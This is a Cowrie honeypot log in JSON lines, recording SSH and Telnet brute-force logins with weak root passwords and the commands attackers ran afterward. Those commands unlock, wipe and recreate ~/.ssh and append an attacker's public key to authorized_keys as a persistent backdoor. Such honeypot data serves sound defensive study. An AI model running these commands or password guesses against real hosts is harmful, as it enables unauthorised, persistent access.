{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:48:40.070082Z","src_ip":"185.152.45.241","session":"3dfaca907ecd"}
{"eventid":"cowrie.login.success","username":"root","password":"wipro123","message":"login attempt [root/wipro123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:48:40.343925Z","src_ip":"185.152.45.241","session":"3dfaca907ecd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:48:40.466939Z","src_ip":"185.152.45.241","session":"3dfaca907ecd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:48:40.467618Z","src_ip":"185.152.45.241","session":"3dfaca907ecd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:48:40.468724Z","src_ip":"185.152.45.241","session":"3dfaca907ecd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:48:40.524066Z","src_ip":"185.152.45.241","session":"3dfaca907ecd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:48:40.733862Z","src_ip":"185.152.45.241","session":"3dfaca907ecd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:48:40.734551Z","src_ip":"185.152.45.241","session":"3dfaca907ecd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:48:41.009558Z","src_ip":"185.152.45.241","session":"3dfaca907ecd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:48:41.010401Z","src_ip":"185.152.45.241","session":"3dfaca907ecd"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11812,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6f4e3e5aebf","protocol":"ssh","message":"New connection: 185.152.45.241:11812 (1.2.3.4:22) [session: e6f4e3e5aebf]","sensor":"my-vps","timestamp":"2025-09-09T02:48:41.053065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:48:41.053793Z","src_ip":"185.152.45.241","session":"e6f4e3e5aebf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:48:41.098698Z","src_ip":"185.152.45.241","session":"e6f4e3e5aebf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:48:41.374118Z","src_ip":"185.152.45.241","session":"e6f4e3e5aebf"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:48:42.445782Z","src_ip":"185.152.45.241","session":"e6f4e3e5aebf"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11817,"dst_ip":"1.2.3.4","dst_port":22,"session":"19ea8fe9b675","protocol":"ssh","message":"New connection: 185.152.45.241:11817 (1.2.3.4:22) [session: 19ea8fe9b675]","sensor":"my-vps","timestamp":"2025-09-09T02:48:42.489125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:48:42.490094Z","src_ip":"185.152.45.241","session":"19ea8fe9b675"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:48:42.538782Z","src_ip":"185.152.45.241","session":"19ea8fe9b675"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:48:42.789251Z","src_ip":"185.152.45.241","session":"19ea8fe9b675"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:48:42.833313Z","src_ip":"185.152.45.241","session":"3dfaca907ecd"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:48:42.844512Z","src_ip":"185.152.45.241","session":"19ea8fe9b675"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11820,"dst_ip":"1.2.3.4","dst_port":22,"session":"8adbba84136c","protocol":"ssh","message":"New connection: 185.152.45.241:11820 (1.2.3.4:22) [session: 8adbba84136c]","sensor":"my-vps","timestamp":"2025-09-09T02:49:53.853559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:49:53.854369Z","src_ip":"185.152.45.241","session":"8adbba84136c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:49:53.936165Z","src_ip":"185.152.45.241","session":"8adbba84136c"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc12345","message":"login attempt [root/Abc12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:49:54.204153Z","src_ip":"185.152.45.241","session":"8adbba84136c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:49:54.327393Z","src_ip":"185.152.45.241","session":"8adbba84136c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:49:54.328028Z","src_ip":"185.152.45.241","session":"8adbba84136c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:49:54.328795Z","src_ip":"185.152.45.241","session":"8adbba84136c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:49:54.383986Z","src_ip":"185.152.45.241","session":"8adbba84136c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:49:54.587785Z","src_ip":"185.152.45.241","session":"8adbba84136c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:49:54.588458Z","src_ip":"185.152.45.241","session":"8adbba84136c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:49:54.639175Z","src_ip":"185.152.45.241","session":"8adbba84136c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:49:54.640193Z","src_ip":"185.152.45.241","session":"8adbba84136c"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11821,"dst_ip":"1.2.3.4","dst_port":22,"session":"a82a2a13abdb","protocol":"ssh","message":"New connection: 185.152.45.241:11821 (1.2.3.4:22) [session: a82a2a13abdb]","sensor":"my-vps","timestamp":"2025-09-09T02:49:54.683524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:49:54.684357Z","src_ip":"185.152.45.241","session":"a82a2a13abdb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:49:54.728454Z","src_ip":"185.152.45.241","session":"a82a2a13abdb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:49:54.948960Z","src_ip":"185.152.45.241","session":"a82a2a13abdb"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:49:55.993753Z","src_ip":"185.152.45.241","session":"a82a2a13abdb"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11822,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6917703931a","protocol":"ssh","message":"New connection: 185.152.45.241:11822 (1.2.3.4:22) [session: e6917703931a]","sensor":"my-vps","timestamp":"2025-09-09T02:49:56.048745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:49:56.049644Z","src_ip":"185.152.45.241","session":"e6917703931a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:49:56.093375Z","src_ip":"185.152.45.241","session":"e6917703931a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:49:56.328802Z","src_ip":"185.152.45.241","session":"e6917703931a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:49:56.384628Z","src_ip":"185.152.45.241","session":"8adbba84136c"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:49:56.385449Z","src_ip":"185.152.45.241","session":"e6917703931a"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":52330,"dst_ip":"1.2.3.4","dst_port":23,"session":"0d10d27996e4","protocol":"telnet","message":"New connection: 79.124.8.120:52330 (1.2.3.4:23) [session: 0d10d27996e4]","sensor":"my-vps","timestamp":"2025-09-09T02:50:34.601209Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:50:34.641057Z","src_ip":"79.124.8.120","session":"0d10d27996e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:50:34.697164Z","src_ip":"79.124.8.120","session":"0d10d27996e4"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":40000,"dst_ip":"1.2.3.4","dst_port":22,"session":"02f9a1396e7c","protocol":"ssh","message":"New connection: 139.19.117.131:40000 (1.2.3.4:22) [session: 02f9a1396e7c]","sensor":"my-vps","timestamp":"2025-09-09T02:50:47.717601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:50:47.723921Z","src_ip":"139.19.117.131","session":"02f9a1396e7c"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T02:50:47.744165Z","src_ip":"139.19.117.131","session":"02f9a1396e7c"}
